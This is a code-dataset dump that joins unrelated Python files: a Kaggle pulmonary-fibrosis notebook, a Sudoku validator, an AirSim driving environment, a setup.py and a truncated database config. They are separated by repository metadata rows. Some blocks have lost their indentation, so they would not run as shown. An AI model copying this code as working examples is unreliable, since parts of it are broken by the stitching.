never_smoked=train[train["SmokingStatus"]=="Never smoked"]
current_smoker=train[train["SmokingStatus"]=="Currently smokes"]
# In[40]:
fig, ax = plt.subplots(nrows=6)
fig.set_size_inches(22, 35)
sns.lineplot(x='Weeks',y='FVC',data=smoker,ax=ax[0]).set_title("EX SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='FVC',data=never_smoked,ax=ax[1]).set_title("NON SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='FVC',data=current_smoker,ax=ax[2]).set_title("SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=smoker,ax=ax[3]).set_title("EX SMOKER PERCENT TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=never_smoked,ax=ax[4]).set_title("NON SMOKER PERCENT TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=current_smoker,ax=ax[5]).set_title("SMOKER PERCENT TREND",fontsize=15,y=0.90)
fig.savefig("weeksvpercent_smokervsnonsmoker.jpeg")
# In[41]:
# creating Age-Bins in train data
category = pd.cut(train.Age,bins = [49,55,65,75,85,120],labels=['<=55','56-65','66-75','76-85','85+'])
train.insert(5,'Age_Bins',category)
# In[42]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["SmokingStatus"], y = train["FVC"], ax=ax1)
b = sns.barplot(x = train["SmokingStatus"], y = train["Percent"], ax=ax2)
a.set_title("Mean FVC per Smoking Status", fontsize=16)
b.set_title("Mean Perc per Smoking Status", fontsize=16);
# In[43]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["Age_Bins"], y = train["FVC"], hue = train["Sex"], ax=ax1)
b = sns.barplot(x = train["Age_Bins"], y = train["Percent"], hue = train["Sex"], ax=ax2)
a.set_title("Mean FVC per Gender per Age category", fontsize=16)
b.set_title("Mean Perc per Gender per Age Category", fontsize=16);
# In[44]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["Age_Bins"], y = train["FVC"], hue = train["SmokingStatus"], ax=ax1)
b = sns.barplot(x = train["Age_Bins"], y = train["Percent"], hue = train["SmokingStatus"], ax=ax2)
a.set_title("Mean FVC per Smoking_status per Age category", fontsize=16)
b.set_title("Mean Perc per Smoking_status per Age Category", fontsize=16);
# In[45]:
plt.figure(figsize=(16,10))
sns.heatmap(train.corr(),annot=True)
# In[46]:
import scipy
# In[47]:
# Compute Correlation
corr1, _ = scipy.stats.pearsonr(train["FVC"], train["Percent"])
corr2, _ = scipy.stats.pearsonr(train["FVC"], train["Age"])
corr3, _ = scipy.stats.pearsonr(train["Percent"], train["Age"])
print("Pearson Corr FVC x Percent: {:.4}".format(corr1), "\n" +
"Pearson Corr FVC x Age: {:.0}".format(corr2), "\n" +
"Pearson Corr Percent x Age: {:.2}".format(corr3))
# In[48]:
train.describe()
# In[49]:
train.info()
# In[50]:
# creating Age-Bins in fc data
category = pd.cut(fc.Age,bins = [49,55,65,75,85,120],labels=['<=55','56-65','66-75','76-85','85+'])
fc.insert(5,'Age_Bins',category)
# In[51]:
fc.info()
# In[52]:
fc.describe()
# In[53]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = fc["Age_Bins"], y = fc["FVC"], hue = fc["SmokingStatus"], ax=ax1)
b = sns.barplot(x = fc["Age_Bins"], y = fc["Percent"], hue = fc["SmokingStatus"], ax=ax2)
a.set_title("Patient FVC per Smoking_status per Age category", fontsize=16)
b.set_title("Patinet Perc per Smoking_status per Age Category", fontsize=16);
# In[54]:
import pydicom
# In[55]:
import os
import json
from pathlib import Path
from glob import glob
# In[56]:
from fastai.basics import *
from fastai.vision.all import *
from fastai.data.transforms import *
from fastai.medical.imaging import *
import pydicom,kornia,skimage
# In[57]:
try:
import cv2
cv2.setNumThreads(0)
except: pass
import seaborn as sns
sns.set(style="whitegrid")
sns.set_context("paper")
# In[58]:
#Visulising Dicom Files
files = Path('D:/Kaggle/Pulmonary Fibrosis/train')
# In[59]:
train_files = get_dicom_files(files)
# In[60]:
train_files
# In[61]:
info_view = train_files[33025]
dimg = dcmread(info_view)
dimg
# In[62]:
#There are some 'key' aspects within the header:
#(0018, 0015) Body Part Examined CS: Chest: images are from the chest area
#(0020, 0013) Instance Number IS: "99": this is the same as the .dcm image file
#(0020, 0032) Image Position (Patient) DS: [-191, -29, -241.200012]: represents the x, y and z positions
#(0020, 0037) Image Orientation (Patient) DS: [1, 0, 0, 0, 1, 0]: This is 6 values that represent two
#normalized 3D vectors(in this case directions) where the first vector [1,0,0] represents Xx, Xy, Xz and the
#second vector [0,1,0] that represents Yx, Yy, Yz.
#(0028, 0004) Photometric Interpretation CS: MONOCHROME2: aka the colorspace, images are being stored
#as low values=dark, high values=bright. If the colorspace was MONOCHROME then the low values=bright and high values=dark.
#(0028, 0100) Bits Allocated US: 16: each image is 16 bits
#(0028, 1050) Window Center DS: "-500.0" : aka Brightness
#(0028, 1051) Window Width DS: "-1500.0" : aka Contrast
#(0028, 1052) Rescale Intercept DS: "-1024.0" and (0028, 1053) Rescale Slope DS: "1.0":
#The Rescale Intercept and Rescale Slope are applied to transform the pixel values of the image into values that
#are meaningful to the application. It's importance is explained further in the kernel.
#(7fe0, 0010) Pixel Data OW: Array of 524288 elements: the image pixel data that pydicom uses to convert the pixel data
#into an image.
#This can be calculated by this formula:
#Array of elements = Rows X Columns X Number of frames X Samples per pixel X (bits_allocated/8)
#so in this example it would be 512 X 512 X 1 X 1 X (16/8) = 524288
# In[63]:
dimg.PixelData[:33025]
# In[218]:
dimg.pixel_array
# In[64]:
dimg.pixel_array.shape
# In[65]:
dimg.show()
# In[66]:
import pydicom as dicom
import PIL # optional
import pandas as pd
import matplotlib.pyplot as plt
# In[67]:
# Metdata of dicomfiles extracted as dataframe
df_dicom = pd.DataFrame.from_dicoms(train_files)
# In[68]:
df_dicom
# In[69]:
df_dicom.describe()
# In[70]:
df_dicom.info()
# In[71]:
df_dicom.head()
# In[72]:
get_ipython().run_line_magic('pwd', '')
# In[73]:
df_dicom.to_csv('df_dicom.csv')
# In[74]:
unique_patient_df = train.drop(['Weeks', 'FVC', 'Percent'], axis=1).drop_duplicates().reset_index(drop=True)
unique_patient_df['# visits'] = [train['Patient'].value_counts().loc[pid] for pid in unique_patient_df['Patient']]
print('Number of data points: ' + str(len(unique_patient_df)))
print('----------------------')
for col in unique_patient_df.columns:
print('{} : {} unique values, {} missing.'.format(col,
str(len(unique_patient_df[col].unique())),
str(unique_patient_df[col].isna().sum())))
unique_patient_df.head()
# In[75]:
#Convert to JPG and extracting all information in one go..
import pydicom as dicom
import matplotlib.pyplot as plt
import os
import cv2
import PIL # optional
import pandas as pd
import csv
# make it True if you want in PNG format
PNG = False
# Specify the .dcm folder path
folder_path = 'D:/Kaggle/Pulmonary Fibrosis/train/ID00007637202177411956430/'
# Specify the .jpg/.png folder path
jpg_folder_path = 'D:\Kaggle\Pulmonary Fibrosis\Train_wkg'
images_path = os.listdir(folder_path)
# In[76]:
arr=dimg.pixel_array
# In[77]:
arr
# In[78]:
df_arr = pd.DataFrame(arr)
# In[79]:
df_arr
# In[80]:
from glob import glob
# In[81]:
PATH_dicom = os.path.abspath(os.path.join('D:/Kaggle/Pulmonary Fibrosis', 'Train_jpg'))
# In[82]:
images_dicom = glob(os.path.join(PATH_dicom, "*.jpg"))
# In[83]:
images_dicom[0:5]
# In[84]:
images_dicom[0:5]
# In[85]:
r = random.sample(images_dicom, 3)
r
# In[86]:
plt.figure(figsize=(16,16))
plt.subplot(131)
plt.imshow(cv2.imread(r[0]))
plt.subplot(132)
plt.imshow(cv2.imread(r[1]))
plt.subplot(133)
plt.imshow(cv2.imread(r[2]));
# In[87]:
get_ipython().run_line_magic('pwd', '')
# In[88]:
submission = pd.read_csv('sample_submission.csv')
# In[89]:
train.drop_duplicates(keep=False, inplace=True, subset=['Patient','Weeks'])
# In[90]:
train
# In[91]:
submission
# In[92]:
submission['Patient'] = (
submission['Patient_Week']
.apply(
lambda x:x.split('_')[0]
)
)
submission['Weeks'] = (
submission['Patient_Week']
.apply(
lambda x: int(x.split('_')[-1])
)
)
submission = submission[['Patient','Weeks','FVC', 'Confidence','Patient_Week']]
submission = submission.merge(test.drop('Weeks', axis=1), on="Patient")
# In[93]:
submission
# In[97]:
test
# In[98]:
train['Dataset'] = 'train'
test['Dataset'] = 'test'
submission['Dataset'] = 'submission'
# In[99]:
submission
# In[100]:
all_data = train.append([test, submission])
all_data = all_data.reset_index()
all_data = all_data.drop(columns=['index'])
# In[101]:
all_data.head()
# In[102]:
all_data['FirstWeek'] = all_data['Weeks']
all_data.loc[all_data.Dataset=='submission','FirstWeek'] = np.nan
all_data['FirstWeek'] = all_data.groupby('Patient')['FirstWeek'].transform('min')
# In[103]:
first_fvc = (
all_data
.loc[all_data.Weeks == all_data.FirstWeek][['Patient','FVC']]
.rename({'FVC': 'FirstFVC'}, axis=1)
.groupby('Patient')
.first()
.reset_index()
)
all_data = all_data.merge(first_fvc, on='Patient', how='left')
# In[104]:
all_data.head()
# In[105]:
all_data
# In[106]:
all_data['WeeksPassed'] = all_data['Weeks'] - all_data['FirstWeek']
# In[107]:
all_data
# In[108]:
#Calculating derived field of height from First FVC value
# Reference - https://en.wikipedia.org/wiki/Vital_capacity#:~:text=It%20is%20equal%20to%20the,a%20wet%20or%20regular%20spirometer
def calculate_height(row):
    """Estimate a patient's height from their first FVC measurement.

    Inverts the standard vital-capacity formula, which differs by sex:
      male:   VC = (27.63 - 0.112 * age) * height
      female: VC = (21.78 - 0.101 * age) * height
    (https://en.wikipedia.org/wiki/Vital_capacity)
    """
    coeff, slope = (27.63, 0.112) if row['Sex'] == 'Male' else (21.78, 0.101)
    return row['FirstFVC'] / (coeff - slope * row['Age'])
all_data['Height'] = all_data.apply(calculate_height, axis=1)
# In[109]:
all_data.head()
# In[110]:
all_data = pd.concat([
all_data,
pd.get_dummies(all_data.Sex),
pd.get_dummies(all_data.SmokingStatus)
], axis=1)
all_data = all_data.drop(columns=['Sex', 'SmokingStatus'])
# In[111]:
all_data.head()
# In[112]:
def scale_feature(series):
    """Min-max normalise *series* into the [0, 1] range, element-wise."""
    lo, hi = series.min(), series.max()
    return (series - lo) / (hi - lo)
all_data['Percent'] = scale_feature(all_data['Percent'])
all_data['Age'] = scale_feature(all_data['Age'])
all_data['FirstWeek'] = scale_feature(all_data['FirstWeek'])
all_data['FirstFVC'] = scale_feature(all_data['FirstFVC'])
all_data['WeeksPassed'] = scale_feature(all_data['WeeksPassed'])
all_data['Height'] = scale_feature(all_data['Height'])
# In[113]:
feature_columns = [
'Percent',
'Age',
'FirstWeek',
'FirstFVC',
'WeeksPassed',
'Height',
'Female',
'Male',
'Currently smokes',
'Ex-smoker',
'Never smoked',
]
# In[114]:
train_new = all_data.loc[all_data.Dataset == 'train']
test_new = all_data.loc[all_data.Dataset == 'test']
submission_new = all_data.loc[all_data.Dataset == 'submission']
# In[115]:
train_new[feature_columns].head()
# In[116]:
train_new
# In[117]:
import sklearn
from sklearn import linear_model
# In[118]:
model = linear_model.LinearRegression()
# In[119]:
model.fit(train_new[feature_columns], train_new['FVC'])
# In[120]:
plt.bar(train_new[feature_columns].columns.values, model.coef_)
plt.xticks(rotation=90)
plt.show()
# In[121]:
from sklearn import linear_model, ensemble
from sklearn.metrics import mean_squared_error, mean_absolute_error
# In[122]:
predictions = model.predict(train_new[feature_columns])
mse = mean_squared_error(
train['FVC'],
predictions,
squared=False
)
mae = mean_absolute_error(
train['FVC'],
predictions
)
print('MSE Loss: {0:.2f}'.format(mse))
print('MAE Loss: {0:.2f}'.format(mae))
# In[123]:
print (model.coef_)
# In[124]:
print (model.intercept_)
# In[125]:
# Rsquare value for the model
model.score(train_new[feature_columns], train_new['FVC'])
# In[126]:
X = train_new[feature_columns]
# In[127]:
Y = train_new['FVC']
# In[128]:
X
# In[129]:
import statsmodels.formula.api as smf
# In[130]:
model_smf_1 = smf.ols(formula='Y~X',data = train_new).fit()
# In[131]:
train_new['prediction'] = predictions
# In[132]:
predictions
# In[133]:
model_smf_1.params
# In[134]:
prediction_smf = model_smf_1.predict(train_new[feature_columns])
# In[135]:
model_smf_1.summary()
# In[136]:
prediction_smf
# In[137]:
predictions
# In[138]:
prds_1_sklearn = pd.DataFrame(predictions)
# In[139]:
prds_1_sklearn
# In[140]:
prds_2_statstools = pd.DataFrame(prediction_smf)
# In[141]:
prds_2_statstools
# In[142]:
plt.scatter(predictions, train_new['FVC'])
plt.xlabel('predictions')
plt.ylabel('FVC (labels)')
plt.show()
# In[143]:
delta = predictions - train_new['FVC']
plt.hist(delta, bins=20)
plt.show()
# In[144]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# In[145]:
train_patients = train_new.Patient.unique()
# In[146]:
fig, ax = plt.subplots(10, 1, figsize=(10, 20))
for i in range(10):
patient_log = train_new[train_new['Patient'] == train_patients[i]]
ax[i].set_title(train_patients[i])
ax[i].plot(patient_log['WeeksPassed'], patient_log['FVC'], label='truth')
ax[i].plot(patient_log['WeeksPassed'], patient_log['prediction'], label='prediction')
ax[i].legend()
# In[149]:
submission_new
train_new
# In[152]:
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestRegressor
from sklearn import metrics
get_ipython().run_line_magic('matplotlib', 'inline')
# In[153]:
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.3, random_state=0)
# In[154]:
#Create a Gaussian Classifier
regr=RandomForestRegressor(random_state=0)
#Train the model using the training sets Y_pred=clf.predict(X_test)
regr.fit(X_train,Y_train)
# In[155]:
regr.n_estimators
# In[156]:
regr.estimators_[5]
# In[157]:
regr.get_params()
# In[158]:
regr.feature_importances_
# In[162]:
Y_pred = regr.predict(X_test)
# In[163]:
df = pd.DataFrame({'Actual': Y_test, 'Predicted': Y_pred})
df
# In[164]:
df1 = df.head(50)
df1.plot(kind='bar',figsize=(16,10))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
# In[165]:
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
# In[166]:
from sklearn.tree import export_graphviz
import pydot
# In[167]:
tree = regr.estimators_[5]
# In[168]:
export_graphviz(tree,out_file = 'tree.dot',
feature_names = X.columns,
filled = True,
rounded = True,precision = 1)
# In[169]:
(graph, ) = pydot.graph_from_dot_file('tree.dot')
# In[170]:
graph
# In[171]:
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
# In[172]:
graph.write_png('tree_graph.png')
# In[173]:
errors_test = abs(Y_pred - Y_test)
# In[174]:
# Display the performance metrics
print('Mean Absolute Error:', round(np.mean(errors_test), 2), 'degrees.')
mape = np.mean(100 * (errors_test / Y_test))
accuracy = 100 - mape
print('Accuracy:', round(accuracy, 2), '%.')
# In[175]:
Y_pred_train=regr.predict(X_train)
# In[176]:
df2 = pd.DataFrame({'Actual': Y_train, 'Predicted': Y_pred_train})
df2
# In[177]:
df3 = df2.head(50)
df3.plot(kind='bar',figsize=(16,10))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
# In[178]:
errors_train = abs(Y_pred_train - Y_train)
# In[179]:
# Display the performance metrics
print('Mean Absolute Error:', round(np.mean(errors_train), 2), 'degrees.')
mape_train = np.mean(100 * (errors_train / Y_train))
accuracy_train = 100 - mape_train
print('Accuracy:', round(accuracy_train, 2), '%.')
# In[234]:
import cv2
import os
import random
import matplotlib.pylab as plt
from glob import glob
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
# In[248]:
files_jpg = Path('D:/Kaggle/Pulmonary Fibrosis/Train_jpg1')
# In[250]:
images_jpg = glob(os.path.join(files_jpg, "*.jpg"))
# In[249]:
files_jpg
# In[252]:
images_jpg
# In[253]:
r_jpg = random.sample(images_jpg, 3)
r_jpg
# Matplotlib black magic
plt.figure(figsize=(16,16))
plt.subplot(131)
plt.imshow(cv2.imread(r_jpg[0]))
plt.subplot(132)
plt.imshow(cv2.imread(r_jpg[1]))
plt.subplot(133)
plt.imshow(cv2.imread(r_jpg[2]));
# In[255]:
def proc_images():
    """
    Read every JPG path in the module-level ``images_jpg`` list and return
    the images resized to a fixed 64x64 resolution.

    Returns:
        list: one resized image array (as returned by cv2) per input file.
    """
    x = []  # images as arrays
    WIDTH = 64
    HEIGHT = 64
    for img in images_jpg:
        # Bug fix: the original passed the whole ``images_jpg`` list to
        # os.path.basename / cv2.imread instead of the current path ``img``,
        # which raised a TypeError on the first iteration.
        full_size_image = cv2.imread(img)
        x.append(cv2.resize(full_size_image, (WIDTH, HEIGHT), interpolation=cv2.INTER_CUBIC))
    return x
# In[261]:
from PIL import Image
# In[267]:
IMG_DIR = 'D:/Kaggle/Pulmonary Fibrosis/Train_jpg1'
for img in os.listdir(IMG_DIR):
img_array = cv2.imread(os.path.join(IMG_DIR,img), cv2.IMREAD_GRAYSCALE)
img_array = (img_array.flatten())
img_array = img_array.reshape(-1, 1).T
print(img_array)
with open('output.csv', 'ab') as f:
np.savetxt(f, img_array, delimiter=",")
# In[281]:
img_array.shape
# In[279]:
os.listdir(IMG_DIR)
# In[278]:
img
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
10515479aab3316ae2f634ef92fdf2aed4b5593f | 464be1d96c23380f2f4d646490928c5995d199c2 | /leet/l36.py | 431afc4e7274d4fc3a944ab25cc23ffd50b5292a | [] | no_license | TatsuLee/pythonPractice | 4c8d83fabd01b36b480c8ef1b9ff656a8d09b026 | 628c536007d131ff91f2057d863c029b2efb1bb1 | refs/heads/master | 2021-07-24T16:46:53.914031 | 2017-10-28T10:21:28 | 2017-10-28T10:21:28 | 68,804,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | class Solution(object):
def isValidSudoku(self, board):
"""
:type board: List[List[str]]
:rtype: bool
"""
# generate 3 empty list to store scaned nums
row = [set() for i in range(9)]
col = [set() for i in range(9)]
grid = [set() for i in range(9)]
for i in range(9):
for j in range(9):
curDigit = board[i][j]
if curDigit == '.':
continue
if curDigit in row[i]:
return False
if curDigit in col[j]:
return False
k = i/3*3+j/3 # find the grid num with (i,j)
if curDigit in grid[k]:
return False
grid[k].add(curDigit)
row[i].add(curDigit)
col[j].add(curDigit)
return True
| [
"dli37@hawk.iit.edu"
] | dli37@hawk.iit.edu |
468a03cc09e3982d357c914a5bd468274a433c55 | d5466ac9513c4cf9addb01fd89b4220696352054 | /DRL/envs/airsim/airsimcarenv.py | eea010e1a42e301f1c07418e08f5c8fc8e98aa45 | [] | no_license | sanketh1691/Don-t-Crash | 99f6bb61f53751d227b31d84bd593945dde04e12 | 9edd845b750d450de0c21543c3a82d19a8571cbc | refs/heads/master | 2023-01-18T21:06:23.052387 | 2020-11-24T03:26:03 | 2020-11-24T03:26:03 | 315,507,066 | 1 | 0 | null | 2020-11-24T03:23:39 | 2020-11-24T03:23:38 | null | UTF-8 | Python | false | false | 4,790 | py | import logging
import math
import numpy as np
import random
import time
import gym
from gym import spaces
from gym.utils import seeding
from gym.spaces import Tuple, Box, Discrete, MultiDiscrete, Dict
from gym.spaces.box import Box
from envs.airsim.myAirSimCarClient import *
logger = logging.getLogger(__name__)
class AirSimCarEnv(gym.Env):
    """OpenAI Gym environment wrapping an AirSim car simulation.

    Observation: (left depth, center depth, right depth, last action index).
    Action: one of 21 discrete steering bins, mapped onto [-2.0, 2.0].
    """
    # NOTE(review): __init__ assigns the module-level global of the same
    # name, not this class attribute — the attribute stays None.
    airsimClient = None
    def __init__(self):
        # left depth, center depth, right depth, steering
        self.low = np.array([0.0, 0.0, 0.0, 0])
        self.high = np.array([100.0, 100.0, 100.0, 21])
        self.observation_space = spaces.Box(self.low, self.high)
        self.action_space = spaces.Discrete(21)
        self.state = (100, 100, 100, random.uniform(-1.0, 1.0))
        self.episodeN = 0   # episodes completed so far
        self.stepN = 0      # steps within the current episode
        self.allLogs = { 'speed':[0] }  # per-key history lists (speed/steer/reward)
        self._seed()
        self.stallCount = 0  # consecutive near-zero-speed steps
        global airsimClient
        airsimClient = myAirSimCarClient()
    def _seed(self, seed=None):
        """Standard Gym seeding hook."""
        self.np_random, seed = seeding.np_random(seed)
        return [seed]
    def computeReward(self, mode='roam'):
        """Compute [reward, dSpeed] for the current step.

        'roam'/'smooth': reward speed, penalize hard steering at speed and
        sudden speed drops (collision proxy); 'smooth' additionally
        penalizes jerky steering changes. Any other mode returns reward 1.
        """
        speed = self.car_state.speed
        steer = self.steer
        dSpeed = 0
        if mode == 'roam' or mode == 'smooth':
            # reward for speed
            reward = speed/60
            # penalize sharp steering, to discourage going in a circle
            if abs(steer) >= 1.0 and speed > 100:
                reward -= abs(steer) * 2
            # penalize collision (approximated by a sharp speed drop)
            if len(self.allLogs['speed']) > 0:
                dSpeed = speed - self.allLogs['speed'][-2]
            else:
                dSpeed = 0
            reward += dSpeed
            # penalize for going in a loop forever
            #reward -= abs(self.steerAverage) * 10
        else:
            reward = 1
            # Placehoder. To be filled
        if mode == 'smooth':
            # also penalize on jerky motion, based on a fake G-sensor
            steerLog = self.allLogs['steer']
            g = abs(steerLog[-1] - steerLog[-2]) * 5
            reward -= g
        return [reward, dSpeed]
    def _step(self, action):
        """Apply one discrete steering action; return (obs, reward, done, info)."""
        assert self.action_space.contains(action), "%r (%s) invalid"%(action, type(action))
        self.stepN += 1
        # Map action index {0..20} onto a steering value in [-2.0, 2.0].
        steer = (action - 10)/5.0
        time.sleep(0.1)
        car_state = airsimClient.getCarState()
        speed = car_state.speed
        self.car_state = car_state
        self.steer = steer
        #gas = 0.45555
        # Throttle governor: ease off as speed approaches ~20.
        # NOTE(review): the double 'gas = gas =' assignment is redundant.
        gas = gas = max(min(20,(speed-20)/-15),0)
        airsimClient.setCarControls(gas, steer)
        speed = car_state.speed
        # End the episode after 3 consecutive near-stalled readings.
        if speed < 0.5:
            self.stallCount += 1
        else:
            self.stallCount = 0
        if self.stallCount > 2:
            done = True
        else:
            done = False
        self.sensors = airsimClient.getSensorStates()
        cdepth = self.sensors[1]
        self.state = self.sensors
        self.state.append(action)
        self.addToLog('speed', speed)
        self.addToLog('steer', steer)
        # Rolling steering average over the last few steps (diagnostic only).
        steerLookback = 17
        steerAverage = np.average(self.allLogs['steer'][-steerLookback:])
        self.steerAverage = steerAverage
        # Training using the Roaming mode
        reward, dSpeed = self.computeReward('roam')
        self.addToLog('reward', reward)
        rewardSum = np.sum(self.allLogs['reward'])
        # Terminate the episode on large cumulative amount penalties,
        # since car probably got into an unexpected loop of some sort
        if rewardSum < -1000:
            done = True
        sys.stdout.write("\r\x1b[K{}/{}==>reward/depth/steer/speed: {:.0f}/{:.0f} \t({:.1f}/{:.1f}/{:.1f}) \t{:.1f}/{:.1f} \t{:.2f}/{:.2f}   ".format(self.episodeN, self.stepN, reward, rewardSum, self.state[0], self.state[1], self.state[2], steer, steerAverage, speed, dSpeed))
        sys.stdout.flush()
        # placeholder for additional logic
        if done:
            pass
        return np.array(self.state), reward, done, {}
    def addToLog (self, key, value):
        # Append value to the named history list, creating it on first use.
        if key not in self.allLogs:
            self.allLogs[key] = []
        self.allLogs[key].append(value)
    def _reset(self):
        """Reset the simulator and per-episode counters; return initial state."""
        airsimClient.reset()
        airsimClient.setCarControls(1, 0)
        time.sleep(0.8)
        self.stepN = 0
        self.stallCount = 0
        self.episodeN += 1
        print("")
        self.allLogs = { 'speed': [0] }
        # Randomize the initial steering to broaden learning
        self.state = (100, 100, 100, random.uniform(0.0, 21.0))
        return np.array(self.state)
"jaiminpa@usc.edu"
] | jaiminpa@usc.edu |
51086a37acacb82ec4da2e56fe316b05793a58d1 | 2335e7d1c10d800abb10b4432465f29a4456548d | /setup.py | 721f1b8d75682c30d9183bd741ff5d826e50db7d | [
"LicenseRef-scancode-warranty-disclaimer",
"EFL-2.0"
] | permissive | deathbybandaid/Sopel-StartupMonologue | 48a7e85ca117c630cf8039af76a0bbaea91ff5a1 | f495344cee379e66ec5022e1e7edf15f075c758c | refs/heads/master | 2020-05-09T11:18:01.564022 | 2019-04-27T14:12:38 | 2019-04-27T14:12:38 | 181,074,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
from setuptools import setup, find_packages
if __name__ == '__main__':
print('Sopel does not correctly load modules installed with setup.py '
'directly. Please use "pip install .", or add {}/sopel_modules to '
'core.extra in your config.'.format(
os.path.dirname(os.path.abspath(__file__))),
file=sys.stderr)
with open('README.md') as readme_file:
readme = readme_file.read()
with open('NEWS') as history_file:
history = history_file.read()
with open('requirements.txt') as requirements_file:
requirements = [req for req in requirements_file.readlines()]
with open('dev-requirements.txt') as dev_requirements_file:
dev_requirements = [req for req in dev_requirements_file.readlines()]
setup(
name='sopel_modules.startupmonologue',
version='0.1.0',
description='Sopel Startup Monologue displays to all channels that the bot is online',
long_description=readme + '\n\n' + history,
author='Sam Zick',
author_email='sam@deathbybandaid.net',
url='https://github.com/deathbybandaid/Sopel-StartupMonologue',
packages=find_packages('.'),
namespace_packages=['sopel_modules'],
include_package_data=True,
install_requires=requirements,
tests_require=dev_requirements,
test_suite='tests',
license='Eiffel Forum License, version 2',
)
| [
"sam@deathbybandaid.net"
] | sam@deathbybandaid.net |
85dedc26a7d0b18671e3606cefba8011ec6f33a6 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_156/521.py | ca8aafaec283d6e9fa857be6020a6168166a825e | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | #!/usr/bin/python3
import sys
import math
ncases = int(sys.stdin.readline().strip())
for t in range(1, ncases+1):
d = int(sys.stdin.readline().strip())
values = sys.stdin.readline().strip().split()
pancakes = [int(x) for x in values]
pancakes.sort(reverse=True)
best = pancakes[0]
# Node format: List of diners with pancakes, number of special minutes
initial_node = [pancakes, 0]
queue = [initial_node]
while queue:
node = queue.pop(0)
diners = node[0]
special = node[1]
top = diners[0]
#if (top + special) >= best:
# continue
if (top + special) < best:
best = top + special
if top < 4:
continue
# Let's introduce new special minutes. Note _all_ diners with
# the max number of pancakes should be split (adding more special
# minuts), as splitting just one of them is stupid
for n in [2, 3, 4]:
splits = []
remainder = top
for i in range(0, n):
split = math.floor(remainder/(n-i))
remainder -= split
splits.append(split)
diners_after_special = list(diners)
new_special = special
while diners_after_special[0] == top:
diners_after_special.pop(0)
diners_after_special += splits
new_special += (n-1)
diners_after_special.sort(reverse=True)
new_node = [diners_after_special, new_special]
queue.append(new_node)
print("Case #{0}: {1}".format(t, best))
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
f21193e2e28fe1cc390d4ae97c312250c7ab7a79 | 947577e28fc58aa7505cc4da0de5ed454c7229ea | /DataStatistics/config/conf_database.py | c9f7c7a7d70b2da3783ef587323eb50427be3d7c | [] | no_license | chuxuan909/Tornado | 32064f110d49af8ff93b93ba9a8af1bb481452dc | 8946405de99dad8720c92248b9ebd06bdfe3c61f | refs/heads/master | 2020-09-05T14:08:20.462058 | 2019-11-08T09:52:40 | 2019-11-08T09:52:40 | 220,128,751 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,731 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from sqlalchemy import create_engine
#mysql连接配置
database_config={
"passwd":"xxxxxxxxx", # 数据库密码
"user":"xxx", # 数据库用户
"url":"xxx.xxx.xxx.xxx", # 数据库地址
"port":3306, # 数据库连接端口
"dbs":{'userdb1':'gHallSvrShardInfo_0','userdb2':'gHallSvrSingleInfo_0',} # mysql连接的库名称
}
#mongo连接配置
database_mongo_config ={
"passwd": "", # 数据库密码
"user": "", # 数据库用户
"url": "xxx.xxxxxx", # 数据库地址,测试
"port": "27017", # 数据库连接端口
"db":"GHall",
"collection":{"col1":"gameCoinDetail","col2":"userPut","col3":"userPutRank"}
}
#redis连接配置
database_redis_config ={
"passwd": "", # redis密码
"user": "", # redis用户
"url": "xxx.xxx.xxx.xxx", # redis地址
"port": "6379", # redis连接端口
"db":2, # redis使用的库
}
def get_arg(info):
    """Fetch a MySQL connection setting by key.

    :param info: configuration key
    :return: the configured value, or None when the key is unknown
    """
    return database_config.get(info)
def get_mongo_arg(info):
    """Fetch a MongoDB connection setting by key.

    :param info: configuration key
    :return: the configured value, or None when the key is unknown
    """
    return database_mongo_config.get(info)
def get_redis_arg(info):
    """Fetch a Redis connection setting by key.

    :param info: configuration key
    :return: the configured value, or None when the key is unknown
    """
    return database_redis_config.get(info)
def test_db():
    '''
    Try connecting to every configured MySQL database and report the result.
    :return: None
    '''
    for value in get_arg('dbs').values():
        engine = create_engine('mysql+pymysql://%s:%s@%s:%d/%s' % (
            get_arg('user'), get_arg('passwd'), get_arg('url'), get_arg('port'), value), max_overflow=15,
                               echo=False)
        try:
            # A successful "show databases" means the connection works.
            dbs_name=engine.execute('show databases')
            if dbs_name:
                print("连接 >>%s:%d<< MySql数据库 [[%s]] 成功" % (get_arg('url'),get_arg('port'),value))
                dbs_name.close()
        except Exception as err:
            # Connection failed: ask the operator to check config/server.
